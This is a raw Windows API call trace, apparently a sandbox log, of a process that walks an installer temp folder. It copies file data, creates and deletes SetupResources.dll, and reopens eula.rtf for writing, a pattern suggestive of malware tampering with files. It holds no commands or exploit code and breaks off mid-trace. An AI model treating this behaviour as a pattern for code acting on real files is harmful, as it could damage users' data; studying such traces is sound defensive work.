[0072.014] SetLastError (dwErrCode=0x0) [0072.014] GetLastError () returned 0x0 [0072.014] SetLastError (dwErrCode=0x0) [0072.014] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0072.014] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.015] GetLastError () returned 0x0 [0072.015] SetLastError (dwErrCode=0x0) [0072.015] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.015] GetLastError () returned 0x0 [0072.015] SetLastError (dwErrCode=0x0) [0072.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0072.015] GetLastError () returned 0x0 [0072.015] SetLastError (dwErrCode=0x0) [0072.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0072.015] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0072.015] GetLastError () returned 0x0 [0072.015] SetLastError (dwErrCode=0x0) [0072.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.016] GetLastError () returned 0x0 [0072.016] SetLastError (dwErrCode=0x0) [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0072.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.016] CloseHandle (hObject=0x418) returned 1 [0072.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.017] CloseHandle (hObject=0x410) returned 1 [0072.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.017] AreFileApisANSI () returned 1 [0072.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0072.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0072.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.019] GetFileType (hFile=0x410) returned 0x1 [0072.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.019] GetLastError () returned 0xb7 [0072.019] SetLastError (dwErrCode=0xb7) [0072.019] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.020] CloseHandle (hObject=0x410) returned 1 [0072.020] AreFileApisANSI () returned 1 [0072.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0072.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0072.020] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.022] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蕐\x07̧비聐螘\x08賂̧")) returned 0 [0072.022] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0072.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0072.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0072.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.023] AreFileApisANSI () returned 1 [0072.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070", lpUsedDefaultChar=0x0) returned 27 [0072.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.023] AreFileApisANSI () returned 1 [0072.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78690 [0072.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78690, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070") returned 27 [0072.023] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070" (normalized: "c:\\588bce7c90097ed212\\2070"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.023] GetLastError () returned 0x5 [0072.023] GetLastError () returned 0x5 [0072.023] SetLastError (dwErrCode=0x5) [0072.023] GetLastError () returned 0x5 [0072.024] SetLastError (dwErrCode=0x5) [0072.024] GetLastError () returned 0x5 [0072.024] SetLastError (dwErrCode=0x5) [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78690 | out: hHeap=0x20000) returned 1 [0072.024] AreFileApisANSI () returned 1 [0072.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78350 [0072.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78350, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070") returned 27 [0072.024] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070" (normalized: "c:\\588bce7c90097ed212\\2070"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.024] GetLastError () returned 0x5 [0072.024] GetLastError () returned 0x5 [0072.024] SetLastError (dwErrCode=0x5) [0072.024] GetLastError () returned 0x5 [0072.024] SetLastError (dwErrCode=0x5) [0072.024] GetLastError () returned 0x5 [0072.024] SetLastError (dwErrCode=0x5) [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78350 | out: hHeap=0x20000) returned 1 [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.025] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="3076", cAlternateFileName="")) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.025] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0072.025] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.025] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0072.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.026] AreFileApisANSI () returned 1 [0072.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.026] AreFileApisANSI () returned 1 [0072.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0072.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.027] GetFileType (hFile=0x410) returned 0x1 [0072.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.027] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.027] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.027] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.027] CloseHandle (hObject=0x410) returned 1 [0072.027] AreFileApisANSI () returned 1 [0072.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0072.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.028] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.028] GetFileType (hFile=0x410) returned 0x1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.028] 